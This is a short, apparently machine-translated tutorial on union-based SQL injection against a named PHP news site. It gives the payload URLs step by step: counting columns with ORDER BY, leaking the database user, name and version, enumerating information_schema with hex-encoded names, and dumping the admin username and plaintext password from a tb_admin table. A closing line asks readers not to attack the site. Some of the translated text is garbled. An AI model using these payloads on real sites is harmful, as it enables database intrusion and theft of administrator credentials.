Php + mysql Injection

Target: http://www.bkjia.com/news.php? Id = 32.
We query the number of fields order
Http://www.bkjia.com/news.php? Id = 32 + order + by + 6 Correct
Http://www.bkjia.com/news.php? Id = 32 + order + by + 7 Error
It indicates that there are 6 fields.
Now we can view the fields displayed on the page.
Http://www.bkjia.com/news.php? Id = 32 + and + 1 = 2 + union + select + 1, 2, 3, 4, 5, 6

. The second and 4th fields are displayed on the page. Now let's take a look at the basic information using the following functions.
Version () version database () Current database user () current user
Replace 2 and 4 fields.
Http://www.bkjia.com/news.php? Id = 32 + and + 1 = 2 + union + select + 1, user (), 3, database (), 5, 6
Figure:
We can see that the current user sq_hwcl @ fgdrgfhdfh is not the ROOT permission.
Current Database: sq_hwscl database version: 5.0.51a-community-nt // Versions later than 5.0 contain information of all databases in the information_schema virtual database.
Above we know that the database is more than 5.0 we can use information_schema to burst out the field list. First burst field http://www.bkjia.com/news.php? Id = 32 + and + 1 = 2 + union + select + 1, table_name, 3, 4, 5, 6 + from + information_schema.tables + where + table_schema = 0x73715F687773636C20
0x73715F687773636C20 is the result returned by the hexadecimal System of sq_hwscl without the expected field. We add a limit0 to the end of the statement, and 1 indicates that only the first data is displayed.
The first data does not have the field we want to change to http://www.bkjia.com/news.php? Id = 32 + and + 1 = 2 + union + select + 1, table_name, 3, 4, 5, 6 + from + information_schema.tables + where + table_schema = 0x73715F687773636C20 + limit +

You can see that the field tb_admin is large and may be used to store the administrator password account. With the field, we will pop up the column name. The statement is as follows: http://www.bkjia.com/news.php? Id = 32 + and + 1 = 2 + union + select + 1, column_name, 3, 4, 5, 6 + from + information_schema.columns + where + table_name = 0x74625F61646D696E
0x74625F61646D696E is the hexadecimal value of the tb_admin field.
We can analyze the principles of the two-day sentence.
In the addition of limit + broke the column name: adminID adminName adminPwd with these we directly join the query on OK http://www.bkjia.com/news.php? Id = 32 + and + 1 = 2 + union + select + 1, adminName, 3, adminPwd, 5, 6 + from + tb_admin broke the management account and password.

The password is not encrypted and the plaintext is sweaty !. After you get this, let's get it. Note: Do not attack or destroy the website I demonstrated. Thank you.